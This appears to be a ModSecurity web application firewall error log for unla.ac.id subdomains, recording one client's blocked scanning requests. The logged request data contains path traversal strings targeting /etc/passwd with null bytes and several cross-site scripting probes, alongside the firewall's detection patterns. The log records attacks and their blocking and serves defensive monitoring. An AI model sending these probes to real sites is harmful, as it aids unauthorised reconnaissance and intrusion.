[Tue Aug 29 11:56:20.104784 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dMCo-f0AAApHRnoAAAAP"]
[Tue Aug 29 11:56:21.004678 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16dMCo-f0AAAqsV8IAAAAB"]
[Tue Aug 29 11:56:21.303923 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16dcCo-f0AAAobUA4AAAAQ"]
[Tue Aug 29 11:56:21.540436 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARYAAAAX"]
[Tue Aug 29 11:56:21.708212 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARgAAAAX"]
[Tue Aug 29 11:56:21.730850 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARkAAAAX"]
[Tue Aug 29 11:56:21.731899 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkAAAAAZ"]
[Tue Aug 29 11:56:21.812067 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkQAAAAZ"]
[Tue Aug 29 11:56:21.830293 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIAR0AAAAX"]
[Tue Aug 29 11:56:21.901393 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIASAAAAAX"]
[Tue Aug 29 11:56:21.954038 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXksAAAAZ"]
[Tue Aug 29 11:56:21.975812 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAAqeFn4AAAAx"]
[Tue Aug 29 11:56:22.014829 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXk4AAAAZ"]
[Tue Aug 29 11:56:22.622675 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAq-HZwAAAAT"]
[Tue Aug 29 11:56:22.719499 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArC7kMAAAAW"]
[Tue Aug 29 11:56:22.916479 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXlYAAAAZ"]
[Tue Aug 29 11:56:23.132795 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAArJXloAAAAZ"]
[Tue Aug 29 11:56:23.134255 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAArC7kgAAAAW"]
[Tue Aug 29 11:56:23.207331 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq5@QIAAAAK"]
[Tue Aug 29 11:56:23.225373 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArC7koAAAAW"]
[Tue Aug 29 11:56:23.236688 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq@skYAAAAM"]
[Tue Aug 29 11:56:23.527756 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArC7kwAAAAW"]
[Tue Aug 29 11:56:23.531345 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArLLckAAAAb"]
[Tue Aug 29 11:56:23.534399 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAq5@QUAAAAK"]
[Tue Aug 29 11:56:23.579822 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq-HaQAAAAT"]
[Tue Aug 29 11:56:23.625146 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArLLcwAAAAb"]
[Tue Aug 29 11:56:23.628472 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArKv1sAAAAa"]
[Tue Aug 29 11:56:23.629229 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArMmpUAAAAf"]
[Tue Aug 29 11:56:23.643986 2023] [:error] [pid 2765] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArNOgwAAAAg"]
[Tue Aug 29 11:56:23.664168 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArLLc4AAAAb"]
[Tue Aug 29 11:56:23.665755 2023] [:error] [pid 2765] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArNOg0AAAAg"]
[Tue Aug 29 11:56:23.674845 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArMmpcAAAAf"]
[Tue Aug 29 11:56:24.724590 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArB10UAAAAV"]
[Tue Aug 29 11:56:24.775306 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArJXmoAAAAZ"]
[Tue Aug 29 11:56:24.779528 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIATsAAAAX"]
[Tue Aug 29 11:56:24.798863 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIATwAAAAX"]
[Tue Aug 29 11:56:24.874764 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIAT8AAAAX"]
[Tue Aug 29 11:56:25.578829 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArIAUEAAAAX"]
